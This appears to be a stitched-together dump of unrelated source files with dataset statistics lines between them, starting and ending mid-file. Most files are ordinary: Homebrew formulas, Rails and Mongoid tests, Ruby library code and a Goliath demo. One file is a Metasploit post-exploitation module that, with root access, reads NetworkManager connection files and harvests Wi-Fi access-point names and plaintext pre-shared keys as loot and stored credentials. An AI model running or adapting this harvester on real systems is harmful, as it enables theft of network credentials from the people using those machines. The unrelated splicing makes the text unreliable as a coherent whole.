  url 'http://luarocks.org/releases/luarocks-2.1.2.tar.gz'
  sha1 '406253d15c9d50bb0d09efa9807fb2ddd31cba9d'

  option 'with-luajit', 'Use LuaJIT instead of the stock Lua'
  option 'with-lua52', 'Use Lua 5.2 instead of the stock Lua'

  if build.include? 'with-luajit'
    depends_on 'luajit'
    # luajit depends internally on lua being installed
    # and is only 5.1 compatible, see #25954
    depends_on 'lua'
  elsif build.include? 'with-lua52'
    depends_on 'lua52'
  else
    depends_on 'lua'
  end

  fails_with :llvm do
    cause "Lua itself compiles with llvm, but may fail when other software tries to link."
  end

  # Remove writability checks in the install script.
  # Homebrew checks that its install targets are writable, or fails with
  # appropriate messaging if not. The check that luarocks does has been
  # seen to have false positives, so remove it.
  # TODO: better document the false positive cases, or remove this patch.
  def patches
    DATA
  end

  def install
    # Install to the Cellar, but direct modules to HOMEBREW_PREFIX
    args = ["--prefix=#{prefix}",
            "--rocks-tree=#{HOMEBREW_PREFIX}",
            "--sysconfdir=#{etc}/luarocks"]

    if build.include? 'with-luajit'
      args << "--with-lua-include=#{HOMEBREW_PREFIX}/include/luajit-2.0"
      args << "--lua-suffix=jit"
      args << "--with-lua=luajit"
    end

    system "./configure", *args
    system "make"
    system "make install"
  end

  def caveats; <<-EOS.undent
    Rocks install to: #{HOMEBREW_PREFIX}/lib/luarocks/rocks
    You may need to run `luarocks install` inside the Homebrew build
    environment for rocks to successfully build. To do this, first run `brew sh`.
    EOS
  end

  test do
    opoo "Luarocks test script installs 'lpeg'"
    system "#{bin}/luarocks", "install", "lpeg"
    system "lua", "-llpeg", "-e", 'print ("Hello World!")'
  end
end
__END__
diff --git a/src/luarocks/fs/lua.lua b/src/luarocks/fs/lua.lua
index 67c3ce0..2d149c7 100644
--- a/src/luarocks/fs/lua.lua
+++ b/src/luarocks/fs/lua.lua
@@ -669,29 +669,5 @@ end
-- @return boolean or (boolean, string): true on success, false on failure,
-- plus an error message.
function check_command_permissions(flags)
- local root_dir = path.root_dir(cfg.rocks_dir)
- local ok = true
- local err = ""
- for _, dir in ipairs { cfg.rocks_dir, root_dir } do
- if fs.exists(dir) and not fs.is_writable(dir) then
- ok = false
- err = "Your user does not have write permissions in " .. dir
- break
- end
- end
- local root_parent = dir.dir_name(root_dir)
- if ok and not fs.exists(root_dir) and not fs.is_writable(root_parent) then
- ok = false
- err = root_dir.." does not exist and your user does not have write permissions in " .. root_parent
- end
- if ok then
- return true
- else
- if flags["local"] then
- err = err .. " \n-- please check your permissions."
- else
- err = err .. " \n-- you may want to run as a privileged user or use your local tree with --local."
- end
- return nil, err
- end
+ return true
end
| 31.317308 | 108 | 0.662266 |
9132818926c03ee249fc749b147d67952158428b | 1,994 | require "test_helper"
# Integration tests for the user signup flow.
class UsersSignupTest < ActionDispatch::IntegrationTest
  # test "the truth" do
  #   assert true
  # end

  test "invalid signup information" do
    get signup_path
    # The POST fails, so User.count must be unchanged afterwards.
    assert_no_difference 'User.count' do
      post users_path, params: { user: { name: "",
                                         email: "user@invalid",
                                         password: "foo",
                                         password_confirmation: "bar" } }
    end
    # The users/new template should be re-rendered.
    assert_template 'users/new'
    # Check the form target URL.
    #assert_select 'form[action="/signup"]' (perhaps the style below is better?)
    assert_select 'form[action=?]', "/signup"
    # The rendered page should contain the error-message markup.
    assert_select 'div#error_explanation'
    assert_select 'div.alert'
    assert_select 'div.alert-danger'
    assert_select 'ul/li'
    # The alert div should contain the string "The form contains".
    assert_select "div.alert", /The form contains/
    # The alert div should contain the string "error".
    assert_select "div.alert", /error/
    # No flash message should be set.
    assert flash.empty?
  end

  # Happy-path signup test.
  test "valid signup information" do
    get signup_path
    # After the POST the user count should have grown by one.
    # (The test database is reset between runs, so this stays stable.)
    assert_difference 'User.count', 1 do
      post users_path, params: { user: { name: "Example User",
                                         email: "[email protected]",
                                         password: "password",
                                         password_confirmation: "password" } }
    end
    # Follow the redirect issued by the POST (users/show on success).
    follow_redirect!
    # The destination should render the users/show template.
    assert_template 'users/show'
    # Check the flash contents.
    assert_select 'div.alert-success', "Welcome to the Sample App!"
    assert_not flash.empty?
    # The user should now be logged in.
    assert is_logged_in?
  end
end
08649d7ff724d197f15c646fe96cc3e7beafd8f3 | 3,942 | module Viewpoint::EWS::Types
class Task
include Viewpoint::EWS
include Viewpoint::EWS::Types
include Viewpoint::EWS::Types::Item
TASK_KEY_PATHS = {
complete?: [:is_complete, :text],
recurring?: [:is_recurring, :text],
start_date: [:start_date, :text],
due_date: [:due_date, :text],
reminder_due_by: [:reminder_due_by, :text],
reminder?: [:reminder_is_set, :text],
percent_complete: [:percent_complete, :text],
status: [:status, :text],
}
TASK_KEY_TYPES = {
recurring?: ->(str){str.downcase == 'true'},
complete?: ->(str){str.downcase == 'true'},
reminder?: ->(str){str.downcase == 'true'},
percent_complete: ->(str){str.to_i},
}
TASK_KEY_ALIAS = {}
# Updates the specified item attributes
#
# Uses `SetItemField` if value is present and `DeleteItemField` if value is nil
# @param updates [Hash] with (:attribute => value)
# @param options [Hash]
# @option options :conflict_resolution [String] one of 'NeverOverwrite', 'AutoResolve' (default) or 'AlwaysOverwrite'
# @option options :send_meeting_invitations_or_cancellations [String] one of 'SendToNone' (default), 'SendOnlyToAll',
# 'SendOnlyToChanged', 'SendToAllAndSaveCopy' or 'SendToChangedAndSaveCopy'
# @return [CalendarItem, false]
# @example Update Subject and Body
# item = #...
# item.update_item!(subject: 'New subject', body: 'New Body')
# @see http://msdn.microsoft.com/en-us/library/exchange/aa580254.aspx
# @todo AppendToItemField updates not implemented
# Applies the given attribute updates to this task via the EWS
# UpdateItem operation: nil values become DeleteItemField changes, other
# known attributes become SetItemField changes; unknown attributes are
# ignored. Reloads and returns self on success.
def update_item!(updates, options = {})
  item_updates = []
  updates.each do |attribute, value|
    item_field = FIELD_URIS[attribute][:text] if FIELD_URIS.include? attribute
    field = {field_uRI: {field_uRI: item_field}}

    if value.nil? && item_field
      # Build DeleteItemField Change
      item_updates << {delete_item_field: field}
    elsif item_field
      # Build SetItemField Change
      hash = { attribute => value }

      # body_type needs to be together with body, so we mix them here if necessary
      # if no body_type is set, the default is 'Text'
      if attribute == :body && updates[:body_type]
        hash[:body_type] = updates[:body_type]
      end

      item = Viewpoint::EWS::Template::Task.new(hash)

      # Remap attributes because ews_builder #dispatch_field_item! uses #build_xml!
      item_attributes = item.to_ews_item.map do |name, value|
        if value.is_a? String
          {name => {text: value}}
        elsif value.is_a? Hash
          node = {name => {}}
          value.each do |attrib_key, attrib_value|
            attrib_key = camel_case(attrib_key) unless attrib_key == :text
            node[name][attrib_key] = attrib_value
          end
          node
        else
          {name => value}
        end
      end

      item_updates << {set_item_field: field.merge(task: {sub_elements: item_attributes})}
    else
      # Ignore unknown attribute
    end
  end

  if item_updates.any?
    data = {}
    data[:conflict_resolution] = options[:conflict_resolution] || 'AutoResolve'
    data[:item_changes] = [{item_id: self.item_id, updates: item_updates}]
    rm = ews.update_item(data).response_messages.first
    if rm && rm.success?
      self.get_all_properties!
      self
    else
      # Fix: the previous guard (`raise ... unless rm`) interpolated rm
      # into the message, so a nil response message crashed with
      # NoMethodError, while a present-but-failed response was silently
      # swallowed. Raise an informative error in both failure cases.
      details = rm ? "#{rm.code}: #{rm.message_text}" : "no response message received"
      raise EwsCreateItemError, "Could not update task item. #{details}"
    end
  end
end
private
# Merge this type's key mappings over those inherited from Item.
def key_paths
  super.merge(TASK_KEY_PATHS)
end

def key_types
  super.merge(TASK_KEY_TYPES)
end

def key_alias
  super.merge(TASK_KEY_ALIAS)
end
end
end
| 34.884956 | 121 | 0.600203 |
08026a517c437f9db83bb650ac97ebcfa2f2f4ec | 1,180 | #
# Copyright 2015-2017, Noah Kantrowitz
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
require 'net/http'
require 'serverspec'

set :backend, :exec

# Smoke-tests a provisioned Rails app listening on port 9001.
# Only runs when the fixture directory /opt/test_rails exists.
# FIX: File.exists? is deprecated (removed in Ruby 3.2); use File.exist?.
describe 'rails', if: File.exist?('/opt/test_rails') do
  describe port(9001) do
    it { is_expected.to be_listening }
  end

  let(:http) { Net::HTTP.new('localhost', 9001) }

  describe '/' do
    subject { http.get('/') }
    its(:code) { is_expected.to eq '200' }
    its(:body) { is_expected.to include '<h1>Hello, Rails!</h1>' }
  end

  describe '/articles' do
    subject { http.get('/articles') }
    its(:code) { is_expected.to eq '200' }
    its(:body) { is_expected.to include '<h1>Listing articles</h1>' }
  end
end
| 28.095238 | 74 | 0.694915 |
1db7026f52905be74d253e34ff92f8b16adf3ab4 | 391 | cask "cursorsense" do
version "2.1.2"
sha256 "393168677f5958ffef36fdf010db84fc3144a34f450497f6a04f176129ef8651"

# The dmg filename embeds the version; the appcast page is polled for updates.
url "https://plentycom.jp/ctrl/files_cs/CursorSense#{version}.dmg"
appcast "https://plentycom.jp/en/cursorsense/download.php"
name "CursorSense"
homepage "https://plentycom.jp/en/cursorsense/"

depends_on macos: ">= :sierra"

# Ships as a System Preferences pane, not a regular .app bundle.
prefpane "CursorSense.prefPane"
end
| 27.928571 | 75 | 0.764706 |
215c3202439f386123591a4ad83c7056a64c9f16 | 10,628 | require "spec_helper"
describe Mongoid::Persistable::Settable do
describe "#set" do
context "when the document is a root document" do
shared_examples_for "a settable root document" do
it "sets the normal field to the new value" do
expect(person.title).to eq("kaiser")
end
it "properly sets aliased fields" do
expect(person.test).to eq("alias-test")
end
it "casts fields that need typecasting" do
expect(person.dob).to eq(date)
end
it "returns self object" do
expect(set).to eq(person)
end
it "persists the normal field set" do
expect(person.reload.title).to eq("kaiser")
end
it "persists sets on aliased fields" do
expect(person.reload.test).to eq("alias-test")
end
it "persists fields that need typecasting" do
expect(person.reload.dob).to eq(date)
end
it "resets the dirty attributes for the sets" do
expect(person).to_not be_changed
end
end
let(:person) do
Person.create
end
let(:date) do
Date.new(1976, 11, 19)
end
context "when provided string fields" do
let!(:set) do
person.set("title" => "kaiser", "test" => "alias-test", "dob" => date)
end
it_behaves_like "a settable root document"
end
context "when provided symbol fields" do
let!(:set) do
person.set(title: "kaiser", test: "alias-test", dob: date)
end
it_behaves_like "a settable root document"
end
end
context "when the document is embedded" do
shared_examples_for "a settable embedded document" do
it "sets the normal field to the new value" do
expect(address.number).to eq(44)
end
it "properly sets aliased fields" do
expect(address.suite).to eq("400")
end
it "casts fields that need typecasting" do
expect(address.end_date).to eq(date)
end
it "returns self object" do
expect(set).to eq(address)
end
it "persists the normal field set" do
expect(address.reload.number).to eq(44)
end
it "persists the aliased field set" do
expect(address.reload.suite).to eq("400")
end
it "persists the fields that need typecasting" do
expect(address.reload.end_date).to eq(date)
end
it "resets the dirty attributes for the sets" do
expect(address).to_not be_changed
end
end
let(:person) do
Person.create
end
let(:address) do
person.addresses.create(street: "t")
end
let(:date) do
Date.new(1976, 11, 19)
end
context "when provided string fields" do
let!(:set) do
address.set("number" => 44, "suite" => "400", "end_date" => date)
end
it_behaves_like "a settable embedded document"
end
context "when provided symbol fields" do
let!(:set) do
address.set(number: 44, suite: "400", end_date: date)
end
it_behaves_like "a settable embedded document"
end
context 'when the field is a relation' do
let(:person) do
Person.create
end
let(:pet) do
Animal.new(name: "somepet")
end
let(:home_phone) do
Phone.new(number: "555-555-5555")
end
let(:office_phone) do
Phone.new(number: "666-666-6666")
end
it "should persist changes of embeds_one field" do
person.set(pet: pet)
expect(person.reload.pet).to eq(pet)
end
it "should persist changes of embeds_many fields" do
person.set({ phone_numbers: [home_phone, office_phone].map { |p| p.as_document} })
expect(person.reload.phone_numbers).to eq([home_phone, office_phone])
end
end
end
end
context "when dynamic attributes are not enabled" do
let(:account) do
Account.create
end
it "raises exception for an unknown attribute " do
expect {
account.set(somethingnew: "somethingnew")
}.to raise_error(Mongoid::Errors::UnknownAttribute)
end
end
context "when dynamic attributes enabled" do
let(:person) do
Person.create
end
it "updates non existing attribute" do
person.set(somethingnew: "somethingnew")
expect(person.reload.somethingnew).to eq "somethingnew"
end
end
context "with an attribute with private setter" do
let(:agent) do
Agent.create
end
let(:title) do
"Double-Oh Seven"
end
it "updates the attribute" do
agent.singleton_class.send :private, :title=
agent.set(title: title)
expect(agent.reload.title).to eq title
end
end
context 'when the field is already set locally' do
let(:church) do
Church.new.tap do |a|
a.location = { 'city' => 'Berlin' }
a.name = 'Church1'
a.save
end
end
context 'when the field is a Hash type' do
before do
church.set('location.neighborhood' => 'Kreuzberg')
end
it 'updates the hash while keeping existing key and values locally' do
expect(church.location).to eq({ 'city' => 'Berlin', 'neighborhood' => 'Kreuzberg'})
end
it 'updates the hash in the database' do
expect(church.reload.location).to eq({ 'city' => 'Berlin', 'neighborhood' => 'Kreuzberg'})
end
end
context 'when the field is assigned with nil' do
before do
church.location = nil
church.set('location.neighborhood' => 'Kreuzberg')
end
it 'updates the hash while keeping existing key and values locally' do
expect(church.location).to eq({'neighborhood' => 'Kreuzberg'})
end
it 'updates the hash in the database' do
expect(church.reload.location).to eq({'neighborhood' => 'Kreuzberg'})
end
end
context 'when the field type is String' do
before do
church.set('name' => 'Church2')
end
it 'updates the field locally' do
expect(church.name).to eq('Church2')
end
it 'updates the field in the database' do
expect(church.reload.name).to eq('Church2')
end
end
context 'when there are two fields of type Hash and String' do
before do
church.set('name' => 'Church2', 'location.street' => 'Yorckstr.')
end
it 'updates the fields locally' do
expect(church.name).to eq('Church2')
expect(church.location).to eq({ 'city' => 'Berlin', 'street' => 'Yorckstr.'})
end
it 'updates the fields in the database' do
expect(church.reload.name).to eq('Church2')
expect(church.reload.location).to eq({ 'city' => 'Berlin', 'street' => 'Yorckstr.'})
end
end
context 'when the field is a nested hash' do
context 'when the field is reset to an empty hash' do
before do
church.set('location' => {})
end
it 'updates the field locally' do
expect(church.location).to eq({})
end
it 'updates the field in the database' do
expect(church.reload.location).to eq({})
end
end
context 'when a leaf value in the nested hash is updated' do
let(:church) do
Church.new.tap do |a|
a.location = {'address' => {'city' => 'Berlin', 'street' => 'Yorckstr'}}
a.name = 'Church1'
a.save
end
end
before do
church.set('location.address.city' => 'Munich')
end
it 'does not reset the nested hash' do
expect(church.name).to eq('Church1')
expect(church.location).to eql({'address' => {'city' => 'Munich', 'street' => 'Yorckstr'}})
end
end
context 'when a leaf value in the nested hash is updated to a number' do
let(:church) do
Church.new.tap do |a|
a.location = {'address' => {'city' => 'Berlin', 'street' => 'Yorckstr'}}
a.name = 'Church1'
a.save
end
end
before do
church.set('location.address.city' => 12345)
end
it 'updates the nested value to the correct value' do
expect(church.name).to eq('Church1')
expect(church.location).to eql({'address' => {'city' => 12345, 'street' => 'Yorckstr'}})
end
end
context 'when the nested hash is many levels deep' do
let(:church) do
Church.new.tap do |a|
a.location = {'address' => {'state' => {'address' => {'city' => 'Berlin', 'street' => 'Yorckstr'}}}}
a.name = 'Church1'
a.save
end
end
before do
church.set('location.address.state.address.city' => 'Munich')
end
it 'does not reset the nested hash' do
expect(church.name).to eq('Church1')
expect(church.location).to eql({'address' => {'state' => {'address' => {'city' => 'Munich', 'street' => 'Yorckstr'}}}})
end
end
end
end
context 'when the field is not already set locally' do
let(:church) do
Church.create
end
context 'when the field is a Hash type' do
before do
church.set('location.neighborhood' => 'Kreuzberg')
end
it 'sets the hash locally' do
expect(church.location).to eq({ 'neighborhood' => 'Kreuzberg'})
end
it 'sets the hash in the database' do
expect(church.reload.location).to eq({ 'neighborhood' => 'Kreuzberg'})
end
end
context 'when the field type is String' do
before do
church.set('name' => 'Church2')
end
it 'sets the field locally' do
expect(church.name).to eq('Church2')
end
it 'sets the field in the database' do
expect(church.reload.name).to eq('Church2')
end
end
context 'when there are two fields of type Hash and String' do
before do
church.set('name' => 'Church2', 'location.street' => 'Yorckstr.')
end
it 'sets the fields locally' do
expect(church.name).to eq('Church2')
expect(church.location).to eq({ 'street' => 'Yorckstr.'})
end
it 'sets the fields in the database' do
expect(church.reload.name).to eq('Church2')
expect(church.reload.location).to eq({ 'street' => 'Yorckstr.'})
end
end
end
end
| 25.671498 | 129 | 0.574802 |
d5dee454b295a36bc3f9d49404a34ab50ca98202 | 63 | module Jekyll
# Namespace holding version metadata for the jekyll-compose gem.
module Compose
  # Current gem release (Semantic Versioning). Frozen so the shared
  # constant string cannot be mutated at runtime.
  VERSION = "0.1.1".freeze
end
end
| 10.5 | 21 | 0.650794 |
8744d21b82f62a3bec7a85dedb805c419d075a21 | 133 | # frozen_string_literal: true
# Entry-point script: load the processing service and run a single pass.
require_relative '../../services/processing_service'

ProcessingService.new.process
| 19 | 52 | 0.81203 |
39e9482c729b6f8c9dd0dc7a399f81a4824d62bd | 148 | class CoursesController < ApplicationController
# Courses are publicly browsable — drop the login filter for this controller.
skip_before_action :require_user

# GET /courses
# Loads the full course list for rendering by the index template.
def index
  @courses = Course.all
end

# GET /courses/new
# No setup needed; Rails renders the default 'new' template.
def new; end
end
| 14.8 | 47 | 0.756757 |
7a9c61cb30e4febc22ba2ff557b39f4a3745ce5a | 992 | # frozen_string_literal: true
module V0
  module Profile
    # Vet360 permission records: all three actions funnel through the shared
    # Vet360::Writeable helper and render the resulting async transaction.
    class PermissionsController < ApplicationController
      include Vet360::Writeable

      before_action { authorize :vet360, :access? }
      after_action :invalidate_cache

      # POST — create a permission record in Vet360.
      def create
        write_permission!
      end

      # PUT — update an existing permission record.
      def update
        write_permission!(http_verb: 'put')
      end

      # DELETE — Vet360 removals are modelled as PUT writes, exactly as the
      # previous inline implementation did.
      def destroy
        write_permission!(http_verb: 'put')
      end

      private

      # Shared body for all three actions; DRYs up the previously
      # triplicated write_to_vet360_and_render_transaction! call.
      def write_permission!(**args)
        write_to_vet360_and_render_transaction!(
          'permission',
          permission_params,
          **args
        )
      end

      # Strong parameters accepted for a Vet360 permission write.
      def permission_params
        params.permit(
          :effective_start_date,
          :id,
          :permission_type,
          :permission_value,
          :source_date,
          :transaction_id,
          :vet360_id
        )
      end
    end
  end
end
| 19.84 | 55 | 0.575605 |
339956b2e48f9ff5163aaed47365980eae891436 | 837 | require 'simple_form_extension/version'
require 'redactor-rails'
require 'selectize-rails'
require 'simple_form'

# Top-level namespace for the simple_form_extension gem; sub-modules are
# registered for eager autoloading via ActiveSupport.
module SimpleFormExtension
  extend ActiveSupport::Autoload

  eager_autoload do
    autoload :Translations
    autoload :ResourceNameHelper
    autoload :Components
    autoload :Inputs
  end

  # Allows overriding which methods are used by the fields that try to fetch
  # the name of a resource to display it instead of calling #to_s
  #
  mattr_accessor :resource_name_methods
  @@resource_name_methods = [:name, :title]
end

# Mix the extension's components into every SimpleForm input, then expose
# the custom inputs namespace. Load order matters: simple_form must already
# be required (see top of file).
SimpleForm::Inputs::Base.send(:include, SimpleFormExtension::Components::Icons)
SimpleForm::Inputs::Base.send(:include, SimpleFormExtension::Components::Popovers)

SimpleForm.custom_inputs_namespaces << 'SimpleFormExtension::Inputs'

require 'simple_form_extension/railtie' if defined?(Rails)
| 28.862069 | 82 | 0.789725 |
1afa0fbff108bae649a6f4bacf79afcd83f41e28 | 2,940 | ##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class MetasploitModule < Msf::Post
  include Msf::Post::File
  include Msf::Post::Linux::Priv
  include Msf::Post::Linux::System
  include Msf::Auxiliary::Report

  def initialize(info={})
    super(update_info(info,
      'Name'         => 'Linux Gather 802-11-Wireless-Security Credentials',
      'Description'  => %q{
        This module collects 802-11-Wireless-Security credentials such as
        Access-Point name and Pre-Shared-Key from your target CLIENT Linux
        machine using /etc/NetworkManager/system-connections/ files.
        The module gathers NetworkManager's plaintext "psk" information.
      },
      'License'      => MSF_LICENSE,
      'Author'       => ['Cenk Kalpakoglu'],
      'Platform'     => ['linux'],
      'SessionTypes' => ['shell', 'meterpreter']
    ))

    register_options(
      [
        OptString.new('DIR', [true, 'The default path for network connections',
          '/etc/NetworkManager/system-connections/']
        )
      ], self.class)
  end

  # Directory holding the NetworkManager connection profiles (DIR option).
  def dir
    datastore['DIR']
  end

  # Extracts AccessPoint name and PSK from one connection profile.
  #
  # @param data [String] contents of a system-connections file
  # @param ap_name [String] access point name (the file's basename)
  # @return [Array(String, String), nil] [ap_name, psk], or nil when the
  #   profile contains no psk entry
  def get_psk(data, ap_name)
    data.each_line do |l|
      if l =~ /^psk=/
        # BUGFIX: split with a limit of 2 so PSKs that legally contain '='
        # characters are not truncated at the second '='.
        psk = l.split('=', 2)[1].strip
        return [ap_name, psk]
      end
    end
    nil
  end

  # Builds a table with one [AP name, PSK] row per readable profile file.
  def extract_all_creds
    tbl = Rex::Ui::Text::Table.new({
      'Header'  => '802-11-wireless-security',
      'Columns' => ['AccessPoint-Name', 'PSK'],
      'Indent'  => 1,
    })

    files = cmd_exec("/bin/ls -1 #{dir}").chomp.split("\n")
    files.each do |f|
      file = "#{dir}#{f}"
      # TODO: find better (ruby) way
      data = read_file(file)
      if data
        print_status("Reading file #{file}")
        ret = get_psk(data, f)
        tbl << ret if ret
      end
    end
    tbl
  end

  # Requires root (profiles are root-readable only); stores results as loot
  # and records each PSK as a credential.
  def run
    unless is_root?
      print_error('You must run this module as root!')
      return
    end

    tbl = extract_all_creds
    if tbl.rows.empty?
      print_status('No PSK has been found!')
      return
    end

    print_line("\n" + tbl.to_s)
    p = store_loot(
      'linux.psk.creds',
      'text/csv',
      session,
      tbl.to_csv,
      File.basename('wireless_credentials.txt')
    )
    print_good("Secrets stored in: #{p}")

    tbl.rows.each do |cred|
      user = cred[0] # AP name
      password = cred[1]
      create_credential(
        workspace_id: myworkspace_id,
        origin_type: :session,
        address: session.session_host,
        session_id: session_db_id,
        post_reference_name: self.refname,
        username: user,
        private_data: password,
        private_type: :password,
      )
    end
    print_status("Done")
  end
end
| 26.017699 | 79 | 0.563946 |
39a987179c40844a5c6705ce03015fb0711142a8 | 1,879 | require 'formula'
# Homebrew formula for the Drupal Coder Sniffer coding standard, linked into
# PHP Code Sniffer and (optionally) installed as a Drush command.
class DrupalCodeSniffer < Formula
  homepage 'https://drupal.org/project/coder'
  version '7.x-2.2'
  url "http://ftp.drupal.org/files/projects/coder-#{version}.tar.gz"
  head 'http://git.drupal.org/project/coder.git', :branch => '7.x-2.x'
  sha1 '9d3591f1035c9b0cd2d406d83a9071f94b826e09'

  option 'without-drush-command', "Don't install drush command"

  depends_on 'php-code-sniffer'

  # Directory where PHP Code Sniffer discovers coding standards.
  def phpcs_standards
    Formula['php-code-sniffer'].phpcs_standards
  end

  # Name under which the standard is registered with PHPCS.
  def drupal_standard_name
    'Drupal'
  end

  # Shared drush command directory used for Drush integration.
  def drush_commands
    HOMEBREW_PREFIX+'share'+'drush'+'commands'
  end

  def install
    prefix.install 'coder_sniffer'

    # Link Drupal Coder Sniffer into PHPCS standards.
    phpcs_standards.mkpath
    if File.symlink? phpcs_standards+drupal_standard_name
      File.delete phpcs_standards+drupal_standard_name
    end
    phpcs_standards.install_symlink prefix+'coder_sniffer'+drupal_standard_name

    # Link Drupal Coder Sniffer into /usr/local/share/drush/commands
    # for integration with Drush.
    if build.with? 'drush-command'
      drush_commands.mkpath
      if File.symlink? drush_commands+name
        File.delete drush_commands+name
      end
      drush_commands.install_symlink prefix+'coder_sniffer' => name
    end
  end

  # Post-install notes shown to the user. (FIX: removed the stray ';' that
  # trailed the method name in `def caveats;`.)
  def caveats
    s = ""
    s += <<-EOS.undent
      Drupal Coder Sniffer is linked to "#{phpcs_standards+drupal_standard_name}".
      You can verify whether PHP Code Sniffer has detected the standard by running:
        #{Formula['php-code-sniffer'].phpcs_script_name} -i
    EOS
    if build.with? 'drush-command'
      s += <<-EOS.undent
        Drupal Coder Sniffer is installed as a drush command in "#{drush_commands+name}".
        You can verify whether Drush has discovered the standard by running:
          drush drupalcs --help
      EOS
    end
    return s
  end
end
| 26.464789 | 91 | 0.702501 |
7a15793805cf2319f29af19a2fd9a01706c06563 | 1,925 | require 'omniauth-google-oauth2'
require 'adwords_api'

module OmniAuth
  module Strategies
    # OmniAuth strategy that extends the stock Google OAuth2 strategy with
    # AdWords: it forces the 'adwords' scope, exchanges the code through the
    # AdWords API library, and attaches AdWords customer info to the auth
    # hash's extra/raw_info section.
    class GoogleAdwordsOauth2 < OmniAuth::Strategies::GoogleOauth2
      option :name, 'google_adwords_oauth2'
      option :skip_friends, true
      option :authorize_options, [:access_type, :hd, :login_hint, :prompt, :request_visible_actions, :scope, :state, :redirect_uri, :include_granted_scopes]
      option :client_options, {
        :site          => 'https://accounts.google.com',
        :authorize_url => '/o/oauth2/auth',
        :token_url     => '/o/oauth2/token'
      }
      option :adwords_api_config, 'adwords_api.yml'
      option :adwords_api_version, :v201409

      # Normalizes the requested scopes (space- or comma-separated), makes
      # sure 'adwords' is among them, and expands short scope names to full
      # URLs unless they are already URLs or known base scopes.
      def authorize_params
        super.tap do |params|
          raw_scope = params[:scope]
          scope_list = raw_scope.split(" ").map {|item| item.split(",")}.flatten
          scope_list << 'adwords' unless scope_list.include?('adwords')
          scope_list.map! { |s| s =~ /^https?:\/\// || BASE_SCOPES.include?(s) ? s : "#{BASE_SCOPE_URL}#{s}" }
          params[:scope] = scope_list.join(" ")
        end
      end

      # Extra payload for the auth hash: id_token, raw profile info, AdWords
      # customer details and the raw token hash returned by the AdWords lib.
      extra do
        hash = {}
        hash[:id_token] = access_token['id_token']
        hash[:raw_info] = raw_info
        hash[:raw_info][:adwords] = adwords_info
        hash[:raw_info][:token] = raw_token || {}
      end

      attr_accessor :raw_token

      # Exchanges the verification code via the AdWords API client instead
      # of the plain OAuth2 client, then wraps the result for OmniAuth.
      def build_access_token
        adwords_api.logger = Rails.logger
        self.raw_token = adwords_api.authorize(oauth2_callback: callback_url, oauth2_verification_code: request.params['code'])
        self.access_token = ::OAuth2::AccessToken.from_hash client, raw_token.dup # dup somehow important!
      end

      # Fetches the authenticated AdWords customer record.
      def adwords_info
        adwords_api.service(:CustomerService, options.adwords_api_version).get()
      end

      # Memoized AdWords API client built from the configured YAML file.
      def adwords_api
        @adwords_api ||= AdwordsApi::Api.new options.adwords_api_config
      end
    end
  end
end
| 32.083333 | 156 | 0.64 |
1a7b71b8f0ab7360ee1d2e2dc6c923f15ab84e38 | 1,789 | #!/usr/bin/env ruby
$: << File.dirname(__FILE__)+'/../../lib'
require 'boot'
require 'goliath'
require 'rack/abstract_format'
require 'yajl/json_gem'
#
# Wait the amount of time given by the 'delay' parameter before responding (default 2.5, max 15.0).
#
# Handles multiple parallel requests:
#
# $ ./app/rack/sleepy_simple.rb -sv -p 9002 -e prod &
# [64277:INFO] 2011-04-24 17:17:31 :: Starting server on 0.0.0.0:9002 in development mode. Watch out for stones.
#
# $ ab -c100 -n100 'http://127.0.0.1:9002/?delay=3.0'
#
# Connection Times (ms)
# min mean[+/-sd] median max
# Connect: 5 7 1.0 7 9
# Processing: 3016 3039 16.6 3041 3063
# Waiting: 3015 3038 16.5 3041 3063
# Total: 3022 3046 16.4 3050 3069
#
# Goliath endpoint that sleeps for the requested 'delay' seconds without
# blocking the reactor, then responds with timing details as JSON.
class SleepySimple < Goliath::API
  use Goliath::Rack::Params
  use Rack::AbstractFormat, 'application/json'
  # Coerces and clamps the 'delay' query param (default 2.5, range 0.0-15.0).
  use Goliath::Rack::Validation::NumericRange, {:key => 'delay', :default => 2.5, :max => 15.0, :min => 0.0, :as => Float}

  def response(env)
    env[:delay] = env.params['delay']

    # EM::Synchrony call allows the reactor to keep spinning: HOORAY CONCURRENCY
    logline env, "sleeping"
    EM::Synchrony.sleep(env[:delay])
    logline env, "after sleep"

    logline env, "sending result"
    [ 200, { 'X-Sleepy-Delay' => env[:delay].to_s }, JSON.generate(timing_info(env)) ]
  end

  protected

  # Requested vs. actual delay, keyed off the request's start time.
  def timing_info(env)
    {
      :start  => env[:start_time].to_f,
      :delay  => env[:delay],
      :actual => (Time.now.to_f - env[:start_time].to_f)
    }
  end

  # Debug log line: start time, elapsed seconds, requested delay, message.
  def logline env, *args
    env.logger.debug( "timer\t%15.4f\t%7.5f\t%3.2f:\t%s" % [env[:start_time], (Time.now.to_f - env[:start_time]), env[:delay], args.join("\t")])
  end
end
| 31.946429 | 144 | 0.606484 |
911109e7ed576632ec1454b467b8a5eeb679fb7c | 829 | # Configure Rails Environment
ENV["RAILS_ENV"] = "test"

require_relative "../test/dummy/config/environment"
require "rails/test_help"

# Load all shared system-test support files.
Dir["#{File.dirname(__FILE__)}/system/**/*.rb"].each { |f| require f }

# Filter out the backtrace from minitest while preserving the one from other libraries.
Minitest.backtrace_filter = Minitest::BacktraceFilter.new

require "rails/test_unit/reporter"
Rails::TestUnitReporter.executable = 'bin/test'

# Load fixtures from the engine
if ActiveSupport::TestCase.respond_to?(:fixture_path=)
  ActiveSupport::TestCase.fixture_path = File.expand_path("fixtures", __dir__)
  ActionDispatch::IntegrationTest.fixture_path = ActiveSupport::TestCase.fixture_path
  ActiveSupport::TestCase.file_fixture_path = ActiveSupport::TestCase.fixture_path + "/files"
  ActiveSupport::TestCase.fixtures :all
end
| 37.681818 | 93 | 0.788902 |
e2e5dd386f21a491f75e1e139148ff731ed95389 | 620 | # frozen_string_literal: true
module Ci
  class PipelineBridgeStatusService < ::BaseService
    # Propagates a pipeline's status to the bridge job that triggered it.
    # No-op when the pipeline was not started by a bridge.
    def execute(pipeline)
      return unless pipeline.bridge_triggered?

      begin
        pipeline.source_bridge.inherit_status_from_downstream!(pipeline)
